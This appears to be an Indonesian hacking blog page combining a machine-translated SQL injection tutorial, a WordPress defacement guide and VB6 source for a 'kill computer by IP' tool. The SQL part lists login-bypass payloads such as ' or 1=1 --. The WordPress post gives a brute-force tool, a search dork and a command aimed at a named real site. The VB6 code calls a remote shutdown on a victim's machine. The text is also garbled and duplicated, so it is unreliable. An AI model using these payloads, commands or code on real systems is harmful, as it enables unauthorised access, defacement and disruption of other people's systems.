Apa itu SQL Injection?
Pada dasarnya SQL Suntikan atau hanya disebut
Structured Query Language Injection merupakan teknik yang
mengeksploitasi lubang loop dalam lapisan aplikasi database. Hal ini
terjadi ketika pengguna keliru atau sengaja (hacker) melarikan diri
memasuki karakter khusus ke dalam bentuk otentikasi username atau
password di URL dari situs web. Its dasarnya lubang pengkodean loop
standar. Kebanyakan pemilik website tidak memiliki pengetahuan yang
tepat dari standar pengkodean aman dan bahwa hasil ke dalam situs web
rentan. Untuk pemahaman yang lebih baik, jika Anda membuka sebuah situs
web dan pergi ke-Nya Sign in atau log in halaman. Sesuatu Sekarang di
lapangan nama pengguna yang Anda masukkan katakan Lokesh dan di kotak
password yang Anda melewati beberapa karakter melarikan diri seperti ‘,
“, 1 = 1, dll .. Sekarang jika pemilik situs tidak ditangani karakter
string null atau melarikan diri karakter maka user pasti akan
mendapatkan sesuatu yang lain bahwa pemilik tidak pernah ingin pengguna
mereka untuk melihat .. Hal ini pada dasarnya disebut Blind SQL.
Persyaratan untuk SQL Injection:
1. Anda perlu web browser untuk membuka URL dan kode sumber.
2. Butuh editor yang baik seperti Notepad + +
untuk melihat kode sumber dalam format berwarna sehingga Anda dapat
dengan mudah membedakan antara hal-hal.
3. Dan pengetahuan yang sangat dasar dari beberapa query SQL seperti SELECT, INSERT, UPDATE, DELETE dll.
What you should look into website to detect is it vulnerable to SQL injection attack or not?
Pertama-tama Anda bisa hack situs-situs yang
menggunakan hacks SQL injection yang memungkinkan masukan dari beberapa
bidang yang dapat memberikan masukan untuk website seperti halaman
login, halaman pencarian, umpan balik halaman dll Saat ini, halaman HTML
menggunakan perintah POST untuk mengirim parameter ke ASP / Halaman
aspx. Oleh karena itu, Anda mungkin tidak melihat parameter dalam URL.
Namun, Anda dapat memeriksa kode sumber HTML, dan mencari tag “FORM”
dalam kode HTML. Anda mungkin menemukan sesuatu seperti ini dalam
beberapa kode HTML:
< F O R M action=login. aspx method=post>
< i n p u t type=hidden name=user v a l u e=xyz>
< / F O R M>
Semuanya antara
dan parameter (menghapus spasi dalam kata-kata)
berisi informasi yang penting dan dapat membantu kita untuk menentukan
hal-hal dengan cara yang lebih terperinci.
Ada metode alternatif untuk mencari situs
yang rentan, situs-situs yang memiliki ekstensi ASP, aspx, JSP, CGI atau
PHP mencoba untuk mencari URL di mana parameter yang dilewatkan. Contoh
ditunjukkan berikut ini:
http://example.com/login.asp?id=10
Sekarang bagaimana untuk mendeteksi bahwa URL ini rentan atau tidak:
Mulailah dengan trik kutip tunggal, mengambil
parameter sampel sebagai hi’or1 = 1 –. Sekarang di id URL di atas adalah
parameter dan 10 nilainya. Jadi ketika kami melewati hi’or1 = 1 –
sebagai parameter URL akan terlihat seperti ini:
http://example.com/login.asp?id=hi ‘atau 1 = 1 -
Anda juga dapat melakukan ini dengan field
tersembunyi, untuk itu anda harus menyimpan halaman web dan harus
perubahan yang dibuat ke lapangan URL dan parameter dan memodifikasi
sesuai. Sebagai contoh:
<F O R M = http://example.com/login action. asp method = p o s> t
<Type input name = tersembunyi = nilai abc = “hi ‘atau 1 = 1 -“>
</ F O R M>
Jika keberuntungan Anda mendukung Anda, Anda akan mendapatkan login ke website tanpa username atau password.
Tapi mengapa ‘atau 1 = 1 -?
Ambil halaman asp yang akan menghubungkan Anda ke halaman lain dengan URL berikut:
http://example.com/search.asp?category=sports
Dalam ‘kategori’ URL ini adalah nama variabel dan ‘olahraga’ adalah nilai itu.
Berikut permintaan ini kebakaran berikut query pada database di latar belakang.
SELECT * FROM TABEL-NAMA WHERE kategori = ‘sports’
Dimana ‘TABEL-NAMA’ adalah nama tabel yang sudah ada dalam database tertentu.
Jadi, query ini mengembalikan semua masukan yang mungkin dari ‘pencarian’ tabel yang datang di bawah ‘olahraga’ kategori.
Sekarang, asumsikan bahwa kita mengubah URL ke dalam sesuatu seperti ini:
http://example.com/search.asp?category=sports ‘atau 1 = 1 -
Sekarang, ‘kategori’ variabel kita sama
dengan “olahraga ‘atau 1 = 1 -“, yang kebakaran query SQL pada database
sesuatu seperti:
SELECT * FROM pencarian WHERE kategori = ‘olahraga’ atau 1 = 1 – ‘
query sekarang harus memilih semuanya dari
tabel ‘pencarian’ terlepas dari apakah kategori adalah sama dengan
‘olahraga’ atau tidak.
Sebuah double dash “-” katakan MS SQL server
untuk mengabaikan seluruh permintaan, yang akan menyingkirkan kutip
tunggal terakhir menggantung (‘).
Kadang-kadang, dimungkinkan untuk mengganti dash double dengan single hash “#”.
Namun, jika tidak server SQL, atau Anda tidak bisa mengabaikan sisa query, Anda juga dapat mencoba
‘Atau’ a ‘=’ a
Ini harus mengembalikan hasil yang sama.
Tergantung pada query SQL yang sebenarnya, Anda mungkin harus mencoba beberapa kemungkinan:
‘Atau 1 = 1 -
“Atau 1 = 1 -
atau 1 = 1 -
‘Atau’ a ‘=’ a
“Atau” a “=” a
‘) Atau (‘ a ‘=’ a
‘Atau”=’
Minggu, 14 Desember 2014
Deface Wordpress Dengan Mudah
Salam Sobat,, ;)
Hajiahh,, dini hari kagak ngapa2in neh, ga bisa tidur :3 tapi ga apa apa dah, setidaknya bisa membuat Tutorial yang berguna buat sobat semua ^_^ langsung dah disimak yooo.. ;)
Note: “Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!”
Pertama Download Bahan-Bahannya:
WPBruteforce
Password: http://indocyberarmy.blogspot.com
Dork: inurl:/wp-login.php
Yup, saatnya kita beraksi.. :)
Live Target: http://live-target.pusku.com/
Pertama, Extract File yg didownload tadi di Directori C: sehingga posisi menajdi C:\WPBrute
Lalu buka comand dengan cara : Klik Start>Run>ketik cmd
Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!
Lalu masukkan perintah: WPBforce.exe -url=http://www.tvbba.nl -user=admin -pass=wordlist.txt -threads=10
Lalu tekan enter!
Tunggu proses hingga selesai!
Wew! Berhasil tuh! wkwkwk Mantap! :p
Langsung Login dah!
GoodLuck!! :D
Hajiahh,, dini hari kagak ngapa2in neh, ga bisa tidur :3 tapi ga apa apa dah, setidaknya bisa membuat Tutorial yang berguna buat sobat semua ^_^ langsung dah disimak yooo.. ;)
Note: “Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!”
Pertama Download Bahan-Bahannya:
WPBruteforce
Password: http://indocyberarmy.blogspot.com
Dork: inurl:/wp-login.php
Yup, saatnya kita beraksi.. :)
Live Target: http://live-target.pusku.com/
Pertama, Extract File yg didownload tadi di Directori C: sehingga posisi menajdi C:\WPBrute
Lalu setelah itu masukkan perintah C:\>cd WPBrute lalu tekan enter!
Mematikan IP Dengan VB 6
buat tampilan Form Seperti dibawah ini :
2.ketik source code dibawah ini :
4.Muncul konfirmasi, jika dipilih Yes maka computer lawan akan mati, jika No maka membatalkan proses pematian computer lawan.
5.selamat mencoba
NB : Tulisan yang bercetak miring diketik dalam 1 baris.
Option Explicit3.setelah selesai jalankan program tersebut, dan masukan IP korban yang diinginkan. Klick Cari dan matikan..
Private Type WSADATA
wVersion As Integer
wHighVersion As Integer
szDescription(0 To 256) As Byte
szSystemStatus(0 To 128) As Byte
imaxsockets As Integer
imaxudp As Integer
lpszvenderinfo As Long
End Type
Private Declare Function WSAStartup Lib “wsock32″ (ByVal VersionReg As Long, WSADatareturn As WSADATA)
As Long
Private Declare Function WSACleanup Lib “wsock32″ () As Long
Private Declare Function inet_addr Lib “wsock32″ (ByVal s As String) As Long
Private Declare Function gethostbyaddr Lib “wsock32″ (haddr As Long, ByVal hnlen As Long, ByVal addrtype As
Long) As Long
Private Declare Sub CopyMemory Lib “kernel32″ Alias “RtlMoveMemory” (xDest As Any, xSource As Any, ByVal
nbytes As Long)
Private Declare Function lstrlen Lib “kernel32″ Alias “lstrlenA” (ByVal lpString As String) As Long
Private Declare Function InitiateSystemShutdown Lib “advapi32.dll” Alias “InitiateSystemShutdownA” (ByVal
lpMachineName As String, ByVal lpMessage As String, ByVal dwTimeout As Long, ByVal bForceAppsClosed As
Long, ByVal bRebootAfterShutdown As Long) As Long
Public Function SocketsInitialize() As Boolean
Dim WSAD As WSADATA
SocketsInitialize = WSAStartup(&H101, WSAD) = 0
End Function
Public Function SocketsInitialize() As Boolean
Dim WSAD As WSADATA
SocketsInitialize = WSAStartup(&H101, WSAD) = 0
End Function
Public Function GetHostNameFromIP(ByVal sAddress As String) As String
Dim ptrHosent As Long
Dim hAddress As Long
Dim nbytes As Long
If SocketsInitialize() Then
hAddress = inet_addr(sAddress)
If hAddress <> -1 Then
ptrHosent = gethostbyaddr(hAddress, 4, 2)
If ptrHosent <> 0 Then
CopyMemory ptrHosent, ByVal ptrHosent, 4
nbytes = lstrlen(ByVal ptrHosent)
If nbytes > 0 Then
sAddress = Space$(nbytes)
CopyMemory ByVal sAddress, ByVal ptrHosent, nbytes
GetHostNameFromIP = sAddress
End If
Else
MsgBox “Error..!!”
End If
WSACleanup
Else
MsgBox “Alamat IP salah..!!”
End If
Else
MsgBox “Winsock Error..!!”
End If
End Function
Private Sub cmdmatikan_Click()
Dim name As String
name = GetHostNameFromIP(txtip.Text)
If MsgBox(“IP ” & txtip.Text & ” (” & name & “)Telah ditemukan” & vbCrLf & “Jadi Dimatikan ?”, vbYesNo +
vbQuestion, “Info”) = vbYes Then
InitiateSystemShutdown “\\” & name, “Selamat Tinggal…”, 30, True, True
End If
End Sub
4.Muncul konfirmasi, jika dipilih Yes maka computer lawan akan mati, jika No maka membatalkan proses pematian computer lawan.
5.selamat mencoba
NB : Tulisan yang bercetak miring diketik dalam 1 baris.
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
Normal
0
false
false
false
IN
X-NONE
X-NONE
MicrosoftInternetExplorer4
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:”Table Normal”;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:””;
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:”Calibri”,”sans-serif”;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:”Times New Roman”;}
Langganan:
Postingan (Atom)